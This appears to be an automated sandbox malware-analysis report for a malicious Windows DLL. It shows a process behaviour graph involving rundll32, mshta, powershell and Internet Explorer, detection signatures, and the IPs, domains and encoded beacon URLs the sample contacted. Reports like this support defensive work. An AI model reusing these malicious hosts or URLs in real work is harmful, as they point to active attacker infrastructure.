  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 444316 Sample: 3a94.dll Startdate: 05/07/2021 Architecture: WINDOWS Score: 100 37 todo.faroin.at 2->37 39 resolver1.opendns.com 2->39 49 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->49 51 Found malware configuration 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 8 other signatures 2->55 8 iexplore.exe 1 55 2->8         started        10 loaddll32.exe 1 2->10         started        12 mshta.exe 19 2->12         started        signatures3 process4 signatures5 15 iexplore.exe 30 8->15         started        18 iexplore.exe 30 8->18         started        20 iexplore.exe 30 8->20         started        22 rundll32.exe 10->22         started        25 cmd.exe 1 10->25         started        27 rundll32.exe 10->27         started        31 2 other processes 10->31 59 Suspicious powershell command line found 12->59 29 powershell.exe 12->29         started        process6 dnsIp7 41 gtr.antoinfer.com 15->41 43 todo.faroin.at 165.232.183.49, 49717, 49718, 49719 ALLEGHENYHEALTHNETWORKUS United States 18->43 45 gtr.antoinfer.com 18->45 47 gtr.antoinfer.com 20->47 57 Writes registry values via WMI 22->57 33 rundll32.exe 25->33         started        35 conhost.exe 29->35         started        signatures8 process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
165.232.183.49
 gtr.antoinfer.com United States
22255 ALLEGHENYHEALTHNETWORKUS true

Contacted Domains

Name IP Active
gtr.antoinfer.com 165.232.183.49 true
resolver1.opendns.com 208.67.222.222 true
todo.faroin.at 165.232.183.49 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/favicon.ico true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/TqiKTzAsbmeVPNQuTP2qUWh/hVxtTSY3Yi/llcJ7qkCpZzGG2TVm/waTVAbLoSME8/MiGLgEPqC5C/QMacbN7bi5gg4i/EPDpjwjNeqvxB8nx8goUN/7UScKdA3erCdyZnr/M1mYt7N44_2BCZB/z_2BQHKBZE3I76X4pk/LLUxigZ_2/FKtPJihoxkrQplteHpxJ/SQ5O5MOBE3EqfyedXsa/WMc6NwZF0braqCo_2FtHND/MeZCuTIpsRPeP/oRY2gUKx/_2BWnIG4Butzcab_2F67iqF/5L_2FfljiF/BmcXquDrczHDDG7sB/8E2Nz3hVUHpI/Iejf3l0Gse2/15LRCzp_2Bw/0DMy true
  • Avira URL Cloud: safe
 unknown
http://todo.faroin.at/6g7Xxs_2FcViNEvb/eUtlbGrmJOFyKjq/4FN1_2BKuLEoXjCSjf/rOtT7yIKe/XRB6VT8HCmGKCo9CPKHU/Y1tIeEDJ_2FZ5yl_2FC/3CWd28J10mPHAD4tnrT0eQ/4O_2BGRTBNWA2/fqx1qdU0/QI6EnaEphgC1mUE1Thrm53Z/ztU91Ji5Ak/31pVhif7ltLzOz9wa/PTfZf7fPEDoP/uPtRBBL_2F_/2FyHjGxoZIO3t9/kK4G4Vnymr0EDYoDEeLP8/HOyGGLeAWlRehWGS/nV7QbBb2S9gvK76/W7SlcXxU8wsH_2FGY1/v4Zp7Lft8CnCAMr/yLw true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob true
  • Avira URL Cloud: safe
 unknown
http://gtr.antoinfer.com/OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ true
  • Avira URL Cloud: safe
 unknown